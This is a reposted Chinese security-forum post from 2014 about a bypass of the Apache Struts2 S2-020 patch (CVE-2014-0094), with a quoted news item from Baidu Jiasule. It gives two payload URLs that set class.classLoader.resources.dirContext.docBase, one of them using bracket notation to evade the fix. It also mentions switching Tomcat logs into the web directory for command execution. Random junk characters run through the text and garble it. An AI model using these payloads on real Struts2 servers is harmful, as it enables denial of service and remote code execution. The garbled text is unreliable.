之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
) j* Y0 n1 G* V- `, T
( g- L/ M- G/ z# w$ s2 w9 Q暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:- http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test! w8 w* W1 o+ l1 U, O O( K
6 O# _# b0 I' M# Q" C: q
[color=rgb(51, 102, 153) !important]复制代码
! E5 {8 p7 |5 Z: n) C
8 Y$ ]6 m |7 p3 _7 u. `绕过方式是:- http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx4 @6 R! N( F9 f0 D( |
% L! k$ N) o6 A4 J. g U$ T+ t W[color=rgb(51, 102, 153) !important]复制代码
' U( ]* f% G; T& C& O% U% j6 B& m% J3 U/ [+ q
顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。 9 H# v% l3 F' i; n4 O- K
加速乐发了新闻:
9 u) @4 |$ @* L1 Y) t3 \0 Dhttp://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/
/ r$ A, r6 B) V4月23日消息,近日安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已率先升级了防御规则,目前百度加速乐可独家防御该漏洞。
1 x/ N: I- u E
/ Q1 `% f, W5 r据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞,国家多家重要政府网站受到影响,其中不乏部委级网站。此次再次曝出漏洞显现出互联网安全问题的严重性。
" L& z6 c5 w" h8 ^- ^" O
4 h, v: a" M( \& s7 v( o2 R9 C: D" g x: i& I- a
3 E, V& N6 S3 o
转载自乌云! p2 {+ ~. r7 r2 G9 {
原文链接:http://zone.wooyun.org/content/11876$ v) i$ }- f, u1 `# }) ]
|
发表于 2014-4-27 19:10:10
收藏
支持
反对